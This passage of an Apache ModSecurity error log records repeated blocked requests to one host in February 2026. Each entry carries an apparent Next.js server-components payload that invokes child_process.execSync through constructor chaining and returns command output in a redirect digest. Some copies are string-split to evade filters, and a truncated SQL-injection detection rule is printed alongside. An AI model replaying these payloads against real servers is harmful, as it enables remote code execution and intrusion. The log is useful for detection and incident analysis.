Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_vbwy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZOoi1EzrCvApMtoJCX1KwAAAQw"] [Tue Feb 17 01:30:19.103373 2026] [:error] [pid 20915:tid 20936] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _twql=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _juwn=Buffer.from(_twql).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_juwn};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1LAAAAQo"] [Tue Feb 17 01:30:19.121706 2026] [:error] [pid 20915:tid 20944] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mtxi=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _jqsv=Buffer.from(_mtxi).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jqsv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1LQAAARI"] [Tue Feb 17 01:30:19.138773 2026] [:error] [pid 20915:tid 20926] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fsfp=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dxwq=Buffer.from(_fsfp).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dxwq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZOoi1EzrCvApMtoJCX1LgAAAQA"] [Tue Feb 17 01:30:19.155226 2026] [:error] [pid 20915:tid 20933] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _bevn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _nqis=Buffer.from(_bevn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nqis};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZOoi1EzrCvApMtoJCX1LwAAAQc"] [Tue Feb 17 01:30:19.172529 2026] [:error] [pid 20915:tid 20937] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wcdl=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jfdq=Buffer.from(_wcdl).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jfdq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZOoi1EzrCvApMtoJCX1MAAAAQs"] [Tue Feb 17 01:30:19.188673 2026] [:error] [pid 20915:tid 20942] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qgzm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hnnb=Buffer.from(_qgzm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hnnb};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZOoi1EzrCvApMtoJCX1MQAAARA"] [Tue Feb 17 01:30:19.204721 2026] [:error] [pid 20915:tid 20935] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hqup=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _sdry=Buffer.from(_hqup).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_sdry};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1MgAAAQk"] [Tue Feb 17 01:30:19.220963 2026] [:error] [pid 20915:tid 20946] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _trsr=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ylvi=Buffer.from(_trsr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ylvi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1MwAAARQ"] [Tue Feb 17 01:30:19.237093 2026] [:error] [pid 20915:tid 20932] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vfyi=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xcac=Buffer.from(_vfyi).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xcac};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZOoi1EzrCvApMtoJCX1NAAAAQY"] [Tue Feb 17 01:30:19.254341 2026] [:error] [pid 20915:tid 20934] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _iidg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _slso=Buffer.from(_iidg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_slso};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZOoi1EzrCvApMtoJCX1NQAAAQg"] [Tue Feb 17 01:30:19.270997 2026] [:error] [pid 20915:tid 20941] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yfgf=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _knvv=Buffer.from(_yfgf).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_knvv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZOoi1EzrCvApMtoJCX1NgAAAQ8"] [Tue Feb 17 01:30:19.287159 2026] [:error] [pid 20915:tid 20931] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hwsd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mffm=Buffer.from(_hwsd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mffm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZOoi1EzrCvApMtoJCX1NwAAAQU"] [Tue Feb 17 01:30:19.303086 2026] [:error] [pid 20915:tid 20943] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _nshr=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xawm=Buffer.from(_nshr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xawm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1OAAAARE"] [Tue Feb 17 01:30:19.318995 2026] [:error] [pid 20915:tid 20930] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mylt=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _wdvt=Buffer.from(_mylt).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wdvt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1OQAAAQQ"] [Tue Feb 17 01:30:19.334826 2026] [:error] [pid 20915:tid 20945] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yoks=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jiyy=Buffer.from(_yoks).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jiyy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZOoi1EzrCvApMtoJCX1OgAAARM"] [Tue Feb 17 01:30:19.350714 2026] [:error] [pid 20915:tid 20928] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pdnl=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _hdwg=Buffer.from(_pdnl).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_hdwg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZOoi1EzrCvApMtoJCX1OwAAAQI"] [Tue Feb 17 01:30:19.366433 2026] [:error] [pid 20915:tid 20947] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zumx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _nmms=Buffer.from(_zumx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nmms};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZOoi1EzrCvApMtoJCX1PAAAARU"] [Tue Feb 17 01:30:19.382617 2026] [:error] [pid 20915:tid 20950] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vpez=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dspw=Buffer.from(_vpez).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dspw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZOoi1EzrCvApMtoJCX1PQAAARg"] [Tue Feb 17 01:30:19.398622 2026] [:error] [pid 20915:tid 20939] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ltzr=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dhih=Buffer.from(_ltzr).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dhih};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZOoi1EzrCvApMtoJCX1PgAAAQ0"] [Tue Feb 17 01:30:19.414316 2026] [:error] [pid 20915:tid 20929] [client 23.180.120.132:39854] [client 23.180.120.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xolb=process['main' 'Module']['req' 